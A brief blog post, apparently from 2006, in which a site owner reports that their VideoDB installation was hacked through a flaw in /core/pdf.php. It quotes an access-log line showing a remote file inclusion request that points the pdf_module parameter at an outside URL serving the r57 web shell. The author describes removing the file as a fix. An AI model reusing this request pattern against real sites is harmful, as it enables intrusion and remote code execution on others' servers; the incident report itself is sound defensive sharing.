Contact
LifestreamSeems that some clever hacker managed to abuse an unforeseen vulnerability in /core/pdf.php (CVS) and run external code (like r57shell). All in all extra annoying since I wasn’t even using PDF export in the first place.
The log reveals the following pattern (pardon the formatting) …
[code]72.20.3.58 - - [29/Sep/2006:15:59:46 +0200] “POST /movies/core/pdf.php?config[pdf_module]= http://membres.lycos.fr/uid/r57en.txt? HTTP/1.1″ 200 24522
“Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)”[/code]Can’t really tell if the vulnerability has been fixed in a more recent version of VideoDB than I was running at the time. I updated the entire script and removed pdf.php just to be on the safe side. Hope that helped.
Hard to say if this was a custom hack or just a random attempt.
